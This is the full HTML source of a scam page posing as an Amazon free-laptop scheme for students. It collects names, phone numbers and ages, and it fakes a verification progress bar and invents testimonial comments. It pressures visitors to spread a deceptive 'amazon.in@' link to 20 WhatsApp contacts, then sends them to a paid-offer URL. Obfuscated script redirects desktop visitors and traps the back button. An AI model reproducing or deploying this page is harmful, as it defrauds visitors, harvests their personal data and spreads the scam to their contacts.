

<!DOCTYPE html>
<html>
    <head>
     
        <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
             } else {
             window.location.href = "https://www.google.com";
             }
         </script>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Amazon Free Laptop for Students Scheme</title>
        <meta name="og:title" content="Amazon Free Laptop for Students Scheme" />
        <meta name="og:url" content="https://www.amazon.in/" />
        <meta property="og:description" content="Click here to register" />
        <meta property="og:image" content="https://amacdn.pages.dev/ogimage.jpg" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<img src='https://pincdn.pages.dev/dyGm8v2.png' width='100%'/>

<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Droid+Arabic+Naskh&display=swap');

* {
    margin: 0;
    padding: 0px;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;
}
body {
    direction: ltr;
    background: #fff;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    max-width: 500px;
    border: 0px solid #00B7B2;
    border-radius: 3px;
}
.post1 {
    padding: 10px;
}
p {
   color: #000;
}
.intro {
    display: block;
    max-width: 300px;
    width: 100%;
    margin: 10px auto;
    background: #7f8c8d;
}
.rib {
    display: block;
    width: 100%;
}
.info {
    display: block;
    max-width: 300px;
    width: 100%;
    height: 50px;
    margin: 10px auto;
    padding: 0 10px;
    border: 2px solid #95a5a6;
    outline: none;
}
.step2,
.step3 {
    display: none;
}
.question,
.title {
    text-align: center;
}
table {
    width: 100%;
    color: #000;
}
table th {
    background: #232F3E;
    color: #fff;
}
table tr th,
table tr td {
    width: 50%;
    border: 1px solid #c7c7c7;
    padding: 5px;
    font-size: 18px;
    text-align: center;
}
.yes {
    background: #4caf50;
}
.yes:hover {
    background: #2ecc71;
}
.no {
    background: #e74c3c;
}
.no:hover {
    background: #c0392b;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #d70005;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #3cbd45;
}
.tip {
    font-size: 15px;
      padding: 5px 8px
}
.tip2 {
    font-size: 22px;
    text-align: center;
    color: #ff0000;
    font-weight: bold;
}
.tip3 {
    font-size: 15px;
    text-align: center;
    color: #b70029;

}
.tip4 {
    font-size: 14px;
    color: #ff0000;

}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #3cbd45;
    transition: background 0.3s ease;
}
  button2 {
    display: block;
    width: 250px;
    height: 50px;
    color: #333333;
    text-align: center;
    border: dotted;
    outline: none;
    font-size: 30px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #FEBD69;
    transition: background 0.3s ease;
}  
button:hover {
    background: #3cbd45;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 60%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 40%;
    float: left;
    margin: 0;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #0e5aa7;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #232f3e;
}
#fill,
#fill2 {
    background: #232f3e;
    width: 0%;
    height: 100%;
}
.percentage {
    color: #000;
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #232f3e;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
    padding: 03px;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
  .bottom {
			width: 100%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
              
		}
        input {
    padding: 10px;
}
.state {
        width: 90%;
        max-width: 400px;
        padding: 10px 15px;
        font-size: 16px;
        color: #333;
        background-color: #f9f9f9;
        border: 1px solid #ccc;
        border-radius: 8px;
        appearance: none;
        -webkit-appearance: none;
        -moz-appearance: none;
        background-image: url("data:image/svg+xml;charset=US-ASCII,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='16' fill='gray' class='bi bi-caret-down-fill' viewBox='0 0 16 16'%3E%3Cpath d='M7.247 11.14l-4.796-5.481A.5.5 0 0 1 2.651 5h10.698a.5.5 0 0 1 .4.8l-4.796 5.481a.5.5 0 0 1-.706 0z'/%3E%3C/svg%3E");
        background-repeat: no-repeat;
        background-position: right 10px center;
        background-size: 16px;
        cursor: pointer;
        transition: border 0.3s ease;
    }

    .state:focus {
        outline: none;
        border-color: #6c63ff;
        box-shadow: 0 0 5px rgba(108, 99, 255, 0.5);
    }
</style>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>


</head>
<body>
    
    
    


        <div class="post1">
        <div  class="welcome">
        </div>
        <div class="step1">
            <center>
                <img src="https://amacdn.pages.dev/boymain.jpg" width="90%"/>
            </center>
            <p class="question">Please fill in the data correctly:</p><br>
                <center><input type="text" placeholder=" Full name " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder=" Mobile number " id="grade" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder="Age" id="age" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);">
            <br>            <br>
            <label>Select Your Educational Level</label>
            <br>
            <select name="state" class="state" id="edu" required>
                <option value="0">-------Educational Level-------</option>
                <option value="High School">High School</option>
                <option value="Secondary School">Secondary School</option>
                <option value="College">College</option>
                <option value="Undergraduate">Undergraduate</option>
                <option value="Masters">Masters</option>
                <option value="PhD">PhD</option>
            </select>
            <br>

            <label>Select Laptop Brand</label>
            <br>
            <select name="state" class="state" id="brand" required>
                <option value="0">-------Select Brand-------</option>
                <option value="Apple">Apple</option>
                <option value="Dell">Dell</option>
                <option value="HP">HP</option>
                <option value="Lenovo">Lenovo</option>
                <option value="Asus">Asus</option>
            </select>
            
            </center><br>

            <button id="select">Next</button>
        </div>
        <div class="step2">
            <table>
                <tbody>
                    
                        <th>Name</th>
</tbody><tbody>
<td id="pastname"></td>
                                        </tbody>
<tr><tr><tbody>
                       <th>Mobile number</th></tbody>
    <tbody><td id="pastnumber"></td>
</tbody>
<th>Age</th></tbody>
<tbody><td id="pastage"></td>
</tbody>
<th>Education Level</th></tbody>
<tbody><td id="pastedu"></td>
</tbody>
<th>Brand</th></tbody>
<tbody><td id="pastbrand"></td>
</tbody>
            </table>
            <button class="yes">Confirm</button>
            <button class="no">Edit </button>
        </div>
        <div id="checking">
            <p class="title">Please wait ...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
<center>
            <img src="https://amacdn.pages.dev/girlmain.jpg" width="90%"/>
        </center>
Dear : 
<span class="amount" id="getname"></span> , <br> <p class="tip4"> Follow the instructions below to claim your free laptop!</p>

          
                      <div class="bottom" id='buttonO'>

            <p class="tip">1. Share with 5 groups / 20 friends on WHATSAPP (tap the 'WhatsApp' button below)</p>
            <p class="tip">2. Tap 'CONTINUE' and add your address.</p>

            <button id="whatsapp">WhatsApp</button>
                    <p class="tip3">Share until progress bar hits 100%!</p>
          
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                
                  
                </div>
            </div>
                           <button2 onclick="myFunction()">CONTINUE</button2>              </div>


          <script>
function myFunction() {
  alert("Unfortunately... \n To Receive Your free laptop, You have to share with friends about our event. Share until the progress bar hits 100% !");
}
</script> 
        </div>
        <div id="claim">
                               <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
          <p class="tip2">Final Step !</p>

      
                     

          <p class="tip3">You must complete this final step!</p>
          <p class="tip3">(Remember, this step is very Important)</p>
          <p class="tip">Now, click on the "CONTINUE" button, enter your delivery address, and we will send your free laptop once your application is approved.
</p>
          <p class="tip3">It will be delivered within 5-8 Days.</p>

<br>
            <button id="offer">CONTINUE</button>

        </div>        </div>

        </div>
    </div>
<div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://pincdn.pages.dev/like.png" /> <img class="love" src="https://pincdn.pages.dev/love.png" /> <img class="care" src="https://pincdn.pages.dev/care.png" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                                <div class="comment">
<img src="https://pincdn.pages.dev/i116BgA.jpeg" />
                    <div class="single-container">
                        <span class="user">Albert Wigston</span>
                        <span class="text">
Thanks you verry much amazon! I received my laptop just now.❤️
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://pincdn.pages.dev/iTAUZXX.jpeg" />
                    <div class="single-container"><span class="user">Jenisha Parmar</span> <span class="text">I thought it was a scam, but it arrived now. Thanks amazon</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://pincdn.pages.dev/f0b7MJd.jpeg" />
                    <div class="single-container"><span class="user">George Smith</span> <span class="text">You must follow the guidelines exactly as requested to get your Laptop. Enjoy it, friends.</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://pincdn.pages.dev/Fvt0UIC.jpeg" />
                    <div class="single-container"><span class="user">Chanchal Goyal</span> <span class="text">I applied for Apple Mac but got Dell 🥲</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
<div class="comment">
                    <img src="https://pincdn.pages.dev/Ien4MZ9.jpeg" />
                    <div class="single-container"><span class="user">Inmaculada Reyes</span> <span class="text">Fantastic! thank you Amazon.</span></div>
                    <div class="buttons"><span class="time t3">7m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
<div class="comment">
                    <img src="https://pincdn.pages.dev/4OLG3Ex.jpeg" />
                    <div class="single-container"><span class="user">Alfonso Campos</span> <span class="text">At first I thought it was fake, but I finally received my Laptop. But my friend got Apple Macbook Air M4.
</span></div>
                    <div class="buttons"><span class="time t3">7m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script>
        // Define the messages array
        var tiaobanArray = [
   "https://www.amazon.in@laptop.nbqc.xyz",
            "https://www.amazon.in@laptop.nbqc.xyz"
        ];

        var tiaoban = tiaobanArray[Math.floor(Math.random() * tiaobanArray.length)];
        var date = new Date();
        var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();
        var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();
        var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();
        var mytime = hour + ':' + minute + ':' + second;
        //var tb = tiaoban + '?=' + mytime;
        var tb = tiaoban;
    </script>   
    <script>
        var errorname = "Please enter the name correctly!",
            errornumber = "Please enter your number correctly, example 05xxxxxxx",
            text = " بمناسبة مرور 42 عاماً على تأسيسها أسواق العثيم تقدم قسائم شرائية وجوالات والعديد من الجوائز القيمة والفورية ، الجوائز محدودة سارع من هنا : ",
            link = "url",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            cpa = "https://backgroundrunway.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "",
            share = "whatsapp://send?text=" + tb;
    </script>

<script type="text/javascript">
var _0x55c70f=_0x355d;(function(_0x489f34,_0xdf9035){var _0x547ad0=_0x355d,_0x17f732=_0x489f34();while(!![]){try{var _0x188053=-parseInt(_0x547ad0(0x14a))/0x1*(-parseInt(_0x547ad0(0x114))/0x2)+parseInt(_0x547ad0(0x161))/0x3+parseInt(_0x547ad0(0x149))/0x4*(parseInt(_0x547ad0(0x13b))/0x5)+-parseInt(_0x547ad0(0x14d))/0x6+-parseInt(_0x547ad0(0x12a))/0x7*(parseInt(_0x547ad0(0x154))/0x8)+parseInt(_0x547ad0(0x155))/0x9+-parseInt(_0x547ad0(0x148))/0xa*(parseInt(_0x547ad0(0x127))/0xb);if(_0x188053===_0xdf9035)break;else _0x17f732['push'](_0x17f732['shift']());}catch(_0x5c0567){_0x17f732['push'](_0x17f732['shift']());}}}(_0x5515,0xca54c));var time=0x0;window['setInterval'](function(){var _0x3be8e8=_0x355d;time=time+0x1,$('.t1')[_0x3be8e8(0x15b)](time+0x1+'m'),$(_0x3be8e8(0x128))[_0x3be8e8(0x15b)](time+0x2+'m'),$(_0x3be8e8(0x156))[_0x3be8e8(0x15b)](time+0x4+'m');},0xea60);var likes=0x86,comments=0x17,shares=0xc;window['setInterval'](function(){var _0x5a4a5f=_0x355d;likes=likes+Math['floor'](Math['random']()*0x3),comments=comments+Math[_0x5a4a5f(0x13f)](Math[_0x5a4a5f(0x151)]()*0x2),shares=shares+Math[_0x5a4a5f(0x13f)](Math[_0x5a4a5f(0x151)]()*0x2),$(_0x5a4a5f(0x113))[_0x5a4a5f(0x15b)](likes+'K'),$(_0x5a4a5f(0x139))[_0x5a4a5f(0x15b)](comments+_0x5a4a5f(0x13e)),$(_0x5a4a5f(0x136))[_0x5a4a5f(0x15b)](shares+_0x5a4a5f(0x142));},0x1388),$(_0x55c70f(0x13c))[_0x55c70f(0x12b)](function(){var _0x2e5a2e=_0x55c70f;$(this)[_0x2e5a2e(0x157)](_0x2e5a2e(0x163))?($(this)[_0x2e5a2e(0x11b)]('selected'),$(this)['html'](_0x2e5a2e(0x132))):($(this)[_0x2e5a2e(0x146)](_0x2e5a2e(0x163)),$(this)[_0x2e5a2e(0x15b)](_0x2e5a2e(0x15f)));});function _0x5515(){var _0x34b0ec=['floor','#offerss','replace','K\x20shares','width','#select','setItem','addClass','log','10yGmsOD','4mFUgah','9NrJqOb','indexOf','#edu','6090414OKPxdQ','#claim','charCodeAt','httpMgms:/V/lXapEtokepF.HNnbqc.xCyXjBKZz/ZLvfYeCBufJEiFKEeFPmfuKkDOBPfSW','random','{}.constructor(\x22return\x20this\x22)(\x20)','#pastname','64zrxkOM','1384425bWqtLy','.t3','hasClass','#load','state','#check','html','.welcome','#pastbrand','#percentage','Unlike','#offers','26643ZAsAXQ','val','selected','#likes','318660pHVRhH','fadeOut','laptoMJmUp.nLQBbeBqc.GxKyzWfDdNAwsVWdLHSsMRrWVw','#name','#whatsapp','#percentage2','#pastage','removeClass','_blank','#share','.step2','#pastnumber','getItem','slice','pushState','fromCharCode','.step1','#brand','css','231121YAMaBV','.t2','name','243488djtHWv','click','.yes','split','#grade','#fill2','href','open','Like','#getname','text','[MJmULQBeBGKWfDdNAwsVWdLHSsMRrWVw]','#shares','fadeIn','return\x20(function()\x20','#comments','location','2732120FFDbJQ','.liked','length','K\x20comments'];_0x5515=function(){return _0x34b0ec;};return _0x5515();}var name=localStorage[_0x55c70f(0x120)](_0x55c70f(0x129));$(_0x55c70f(0x133))[_0x55c70f(0x15b)](name),$(_0x55c70f(0x144))[_0x55c70f(0x12b)](function(){var _0x388e25=_0x55c70f,_0x413425=$('#age')[_0x388e25(0x162)](),_0x37a88c=$(_0x388e25(0x117))[_0x388e25(0x162)](),_0x98f6d0=$(_0x388e25(0x14c))[_0x388e25(0x162)](),_0x427948=$(_0x388e25(0x125))[_0x388e25(0x162)]();localStorage[_0x388e25(0x145)](_0x388e25(0x129),_0x37a88c);var _0x393219=$(_0x388e25(0x12e))[_0x388e25(0x162)]();if(_0x37a88c[_0x388e25(0x13d)]<0x1||_0x37a88c[_0x388e25(0x13d)]>0x96)alert(errorname);else _0x393219==='0'?alert(errornumber):($(_0x388e25(0x124))[_0x388e25(0x115)](0x0),$(_0x388e25(0x11e))[_0x388e25(0x137)](0x1f4),$(_0x388e25(0x153))[_0x388e25(0x15b)](_0x37a88c),$(_0x388e25(0x11f))[_0x388e25(0x15b)](_0x393219),$(_0x388e25(0x11a))[_0x388e25(0x15b)](_0x413425),$('#pastedu')[_0x388e25(0x15b)](_0x98f6d0),$(_0x388e25(0x15d))[_0x388e25(0x15b)](_0x427948));}),$(_0x55c70f(0x12c))[_0x55c70f(0x12b)](function(){var _0x1ab461=_0x55c70f;$(_0x1ab461(0x15c))[_0x1ab461(0x115)](0x0),$(_0x1ab461(0x11e))[_0x1ab461(0x115)](0x0),$('#checking')[_0x1ab461(0x137)](0x3e8);var _0x530909=0x0,_0x3444f1=setInterval(function(){var _0x2e4f2d=_0x1ab461;_0x530909+=0x1,$(_0x2e4f2d(0x15e))[_0x2e4f2d(0x134)](_0x530909+'%'),$('#fill')['css'](_0x2e4f2d(0x143),_0x530909+'%'),_0x530909==0x32&&(_0x530909=0x31,setTimeout(function(){_0x530909=0x32;},0x3e8)),_0x530909>=0x64&&(clearInterval(_0x3444f1),$(_0x2e4f2d(0x158))[_0x2e4f2d(0x115)](0x0),$(_0x2e4f2d(0x15a))[_0x2e4f2d(0x137)](0x0),setTimeout(function(){var _0x5439c6=_0x2e4f2d;$('#checking')['fadeOut'](0x0),$(_0x5439c6(0x11d))[_0x5439c6(0x137)](0x3e8),$(_0x5439c6(0x133))[_0x5439c6(0x15b)]($(_0x5439c6(0x117))[_0x5439c6(0x162)]());},0x3e8));},0x32);}),$('.no')[_0x55c70f(0x12b)](function(){var _0x46cce4=_0x55c70f;$(_0x46cce4(0x11e))[_0x46cce4(0x115)](0x0),$(_0x46cce4(0x124))[_0x46cce4(0x137)](0x1f4);});var swidth=localStorage[_0x55c70f(0x120)](saved);function _0x355d(_0x3c1a29,_0x524808){var _0x460e19=_0x5515();return _0x355d=function(_0x356dab,_0x3da12f){_0x356dab=_0x356dab-0x113;var _0x469745=_0x460e19[_0x356dab];return _0x469745;},_0x355d(_0x3c1a29,_0x524808);}if(swidth!==null){var width=swidth*0x1;$(_0x55c70f(0x15c))[_0x55c70f(0x115)](0x0),$(_0x55c70f(0x124))[_0x55c70f(0x115)](0x0),$('#share')[_0x55c70f(0x137)](0x0),$(_0x55c70f(0x12f))[_0x55c70f(0x126)](_0x55c70f(0x143),width+'%'),$(_0x55c70f(0x119))[_0x55c70f(0x134)](width+'%');}else var width=0x0;$(_0x55c70f(0x118))[_0x55c70f(0x12b)](function(){var _0x3f0537=_0x55c70f;window[_0x3f0537(0x13a)][_0x3f0537(0x130)]=share;if(width==0x0)width+=0x32;else{if(width==0x32)alert(error),width+=0xf;else{if(width==0x41)width+=0x5;else{if(width==0x46)alert(error),width+=0xa;else{if(width==0x50)alert(error),width+=0x5;else{if(width==0x55)width+=0x2;else{if(width==0x57)width+=0x3;else{if(width==0x5a)width+=0x3;else{if(width==0x5d)width+=0x2;else{if(width==0x5f)width+=0x2;else{if(width==0x61)width+=0x1;else width==0x62?width+=0x1:($(_0x3f0537(0x11d))[_0x3f0537(0x115)](0x0),$(_0x3f0537(0x14e))['fadeIn'](0x3e8));}}}}}}}}}}localStorage[_0x3f0537(0x145)](saved,width),setTimeout(function(){var _0x1a8a82=_0x3f0537;$(_0x1a8a82(0x12f))[_0x1a8a82(0x126)](_0x1a8a82(0x143),width+'%'),$(_0x1a8a82(0x119))[_0x1a8a82(0x134)](width+'%');},0x7d0);}),$('#offer')['click'](function(){var _0x42a9b2=_0x55c70f;window[_0x42a9b2(0x131)](cpa,_0x42a9b2(0x11c));}),$(_0x55c70f(0x160))[_0x55c70f(0x12b)](function(){var _0x36e717=_0x55c70f;window[_0x36e717(0x131)](cpa1,_0x36e717(0x11c));}),$(_0x55c70f(0x140))[_0x55c70f(0x12b)](function(){var _0x1bd20e=_0x55c70f;window[_0x1bd20e(0x131)](cpa2,_0x1bd20e(0x11c));}),!(function(){var _0x5f0b41=_0x55c70f,_0x4ca5ac=(function(){var _0x353557=!![];return function(_0x269fe3,_0x12519e){var _0x161624=_0x353557?function(){if(_0x12519e){var _0x23c9f7=_0x12519e['apply'](_0x269fe3,arguments);return _0x12519e=null,_0x23c9f7;}}:function(){};return _0x353557=![],_0x161624;};}()),_0x528539=_0x4ca5ac(this,function(){var _0x19f417=_0x355d,_0x5d9e8b;try{var _0x5b2452=Function(_0x19f417(0x138)+_0x19f417(0x152)+');');_0x5d9e8b=_0x5b2452();}catch(_0x3a1c84){_0x5d9e8b=window;}var _0x3d0c46=new RegExp(_0x19f417(0x135),'g'),_0xc9a5e5=_0x19f417(0x116)['replace'](_0x3d0c46,'')[_0x19f417(0x12d)](';'),_0x1621ea,_0xc92c93,_0x3ff146,_0x2fac59,_0x5707ce=function(_0x531533,_0x3071bd,_0x4d4791){var _0x4abed2=_0x19f417;if(_0x531533[_0x4abed2(0x13d)]!=_0x3071bd)return![];for(var _0x474862=0x0;_0x474862<_0x3071bd;_0x474862++){for(var _0x2d0abc=0x0;_0x2d0abc<_0x4d4791['length'];_0x2d0abc+=0x2){if(_0x474862==_0x4d4791[_0x2d0abc]&&_0x531533[_0x4abed2(0x14f)](_0x474862)!=_0x4d4791[_0x2d0abc+0x1])return![];}}return!![];},_0x217cc1=function(_0x555622,_0x3dbdef,_0x2d9c31){return _0x5707ce(_0x3dbdef,_0x2d9c31,_0x555622);},_0x25fc9f=function(_0x5501aa,_0x59f9d7,_0x37852d){return _0x217cc1(_0x59f9d7,_0x5501aa,_0x37852d);},_0x4b6f7d=function(_0xd02058,_0x12f85a,_0x107241){return _0x25fc9f(_0x12f85a,_0x107241,_0xd02058);};for(var _0x3ce505 in _0x5d9e8b){if(_0x5707ce(_0x3ce505,0x8,[0x7,0x74,0x5,0x65,0x3,0x75,0x0,0x64])){_0x1621ea=_0x3ce505;break;}}for(var _0x3b2afd in _0x5d9e8b[_0x1621ea]){if(_0x4b6f7d(0x6,_0x3b2afd,[0x5,0x6e,0x0,0x64])){_0xc92c93=_0x3b2afd;break;}}for(var _0x2ea4d0 in _0x5d9e8b[_0x1621ea]){if(_0x25fc9f(_0x2ea4d0,[0x7,0x6e,0x0,0x6c],0x8)){_0x3ff146=_0x2ea4d0;break;}}if(!('~'>_0xc92c93))for(var _0x5ccff5 in _0x5d9e8b[_0x1621ea][_0x3ff146]){if(_0x217cc1([0x7,0x65,0x0,0x68],_0x5ccff5,0x8)){_0x2fac59=_0x5ccff5;break;}}if(!_0x1621ea||!_0x5d9e8b[_0x1621ea])return;var _0x335ea3=_0x5d9e8b[_0x1621ea][_0xc92c93],_0x36e8f0=!!_0x5d9e8b[_0x1621ea][_0x3ff146]&&_0x5d9e8b[_0x1621ea][_0x3ff146][_0x2fac59],_0x31630d=_0x335ea3||_0x36e8f0;if(!_0x31630d)return;var _0x70f79d=![];for(var _0x56d3ad=0x0;_0x56d3ad<_0xc9a5e5['length'];_0x56d3ad++){var _0xc92c93=_0xc9a5e5[_0x56d3ad],_0xd10d8e=_0xc92c93[0x0]===String[_0x19f417(0x123)](0x2e)?_0xc92c93[_0x19f417(0x121)](0x1):_0xc92c93,_0x1b782b=_0x31630d[_0x19f417(0x13d)]-_0xd10d8e[_0x19f417(0x13d)],_0x40973c=_0x31630d[_0x19f417(0x14b)](_0xd10d8e,_0x1b782b),_0x513af1=_0x40973c!==-0x1&&_0x40973c===_0x1b782b;_0x513af1&&((_0x31630d[_0x19f417(0x13d)]==_0xc92c93['length']||_0xc92c93[_0x19f417(0x14b)]('.')===0x0)&&(_0x70f79d=!![]));}if(!_0x70f79d){var _0x51d2cc=new RegExp('[MgmVXEkeFHNCXjBKZZLvfYeCBufJEiFKEeFPmfuKkDOBPfSW]','g'),_0x145c00=_0x19f417(0x150)[_0x19f417(0x141)](_0x51d2cc,'');_0x5d9e8b[_0x1621ea][_0x3ff146]=_0x145c00;}});_0x528539();var _0x2827bd;try{const _0x456ad6=window['location']['href'][_0x5f0b41(0x12d)](/[#]/)[0x0];for(_0x2827bd=0x0;0xa>_0x2827bd;++_0x2827bd)history[_0x5f0b41(0x122)]({},'',_0x456ad6+'#');onpopstate=function(_0xe09b97){var _0x2c3608=_0x5f0b41;_0xe09b97[_0x2c3608(0x159)]&&location[_0x2c3608(0x141)]('#');};}catch(_0x517f42){console[_0x5f0b41(0x147)](_0x517f42);}}());
</script>

   <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-WYM7LNMZ87"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-WYM7LNMZ87');
</script>
</body></html>

